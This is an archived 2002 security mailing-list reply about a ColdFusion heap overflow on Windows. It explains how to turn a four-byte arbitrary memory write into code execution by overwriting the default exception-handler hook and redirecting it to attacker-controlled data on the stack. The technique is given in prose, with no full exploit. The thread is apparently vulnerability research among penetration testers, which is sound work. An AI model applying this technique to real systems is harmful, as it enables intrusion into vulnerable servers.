Re: ColdFusion Heap Overflow -continued

If you can move 4 bytes of choice to any location in your virtual environment you can overwrite any stored 32 bit address. Loaded Image data sections ands and loader environment data have reliable addresses due the support of basing by the operating system and loader. If you want immediate execution overwrite a hook address. Many API's suites have hooks you can overwrite. The hook you choose depends on the situation of the vulnerability you are dealing with.

In this situation you may throw a fault after the following 'mov' instruction attempts to access a memory address of the data you supplied. If the 4 bytes you overwrote data with do not signify a valid address, a fault will be issued. So use the fault-handling system in place. On win* this is structured exception handling.

When a fault is generated in a thread an exception list taken from the threads TIB. This list is cycled twice and then the default exeception handler is called. This default exception handler is in charge of generated a window so that the interface user can see the application had a fatal error. To allow the configurability of this default behavior developers introduced a hook so that another developer in the future could create his or her own default handler.

This hook is loaded into an address that can be modified at runtime, it's also loaded in data with write privilege. Overwrite it with a relative address of a call or jmp that references a stack offset. This stack offset is where the address of your payload buffer will be. Keep in mind that if you can't find a sufficient byte sequence for your relative call, any data on the stack is seen as code to the processor during execution. Use any value you can control on the stack for your benefit. Every 32 bit function variable is an instruction up to 4 bytes in length if you can control it. Data sizes, id's ,index's, port numbers....

Turn your stack into a big buffer of your code :)

-R

Riley Hassell
Security Research Associate
eEye Digital Security

• Original Message ----- From: "Gary O'leary-Steele" <garyo@sec-1.com> To: <pen-test@securityfocus.com>; <vuln-dev@securityfocus.com> Sent: Friday, November 15, 2002 9:26 AM Subject: ColdFusion Heap Overflow -continued

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

> Hi all,
do)
> with mov [ecx],eax where ecx = 0x77f8e43b and eax =0x41414141 doesn't seem
Received on Sun Nov 17 14:15:15 2002